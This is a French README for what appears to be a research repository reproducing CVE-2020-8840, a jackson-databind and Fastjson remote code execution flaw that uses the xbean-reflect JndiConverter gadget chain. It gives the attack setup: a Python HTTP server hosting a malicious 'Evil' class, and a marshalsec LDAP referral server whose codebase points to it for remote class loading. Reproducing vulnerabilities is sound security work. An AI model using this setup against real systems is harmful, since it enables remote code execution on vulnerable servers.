
Vulnérabilité d'exécution de code à distance dans Jackson-databind (CVE-2020-8840) code d'environnement d'analyse et de reproduction
Code d'analyse et de reproduction de l'environnement pour la vulnérabilité d'exécution de code à distance dans Jackson-databind (CVE-2020-8840).
Le projet contient :
jackson-databind et Fastjsonmarshalsec-0.0.3-SNAPSHOT-all.jar compiléLa vulnérabilité d'exécution de code à distance dans Jackson-databind (CVE-2020-8840) permet à un attaquant d'utiliser la chaîne d'exploitation xbean-reflect (org.apache.xbean.propertyeditor.JndiConverter) pour déclencher le chargement de classes à distance via JNDI, atteignant ainsi une exécution de code à distance.
Cette vulnérabilité affecte également certaines versions de jackson-databind et Fastjson.
Versions concernées : 2.0.0 <= FasterXML jackson-databind <= 2.9.10.2

Le service LDAP indiqué dans le code d'exemple doit être configuré par vos soins.
WebServer
Démarrez un service HTTP, hébergez la classe malveillante (la classe Evil.java est fournie dans le projet).
python -m http.server 2222

Service LDAP
Téléchargez l'outil Marshalsec, compilez-le en fichier JAR, démarrez le service LDAP et définissez l'adresse codebase (le WebServer qui héberge la classe malveillante).
Par souci de commodité, pour éviter les opérations de téléchargement et de compilation, le projet inclut également marshalsec-0.0.3-SNAPSHOT-all.jar (le code du projet n'est pas volumineux, c'est la principale raison de sa taille importante), compilé avec JDK8.
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:2222/#Evil

Versions concernées : Fastjson <= 1.2.62
L'environnement de reproduction est le même que ci-dessus ; vous devez démarrer vous-même les services WebServer et LDAP.
